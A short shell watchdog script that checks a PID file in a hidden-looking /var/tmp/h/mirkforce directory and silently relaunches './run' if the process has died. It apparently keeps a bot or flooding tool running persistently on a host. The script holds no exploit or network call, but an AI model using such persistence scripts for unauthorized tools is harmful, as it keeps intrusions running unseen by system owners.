#!/bin/sh
if test -r /var/tmp/h/mirkforce/all/m.pid; then
pid=$(cat /var/tmp/h/mirkforce/all/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /var/tmp/h/mirkforce/all
./run &>/dev/null
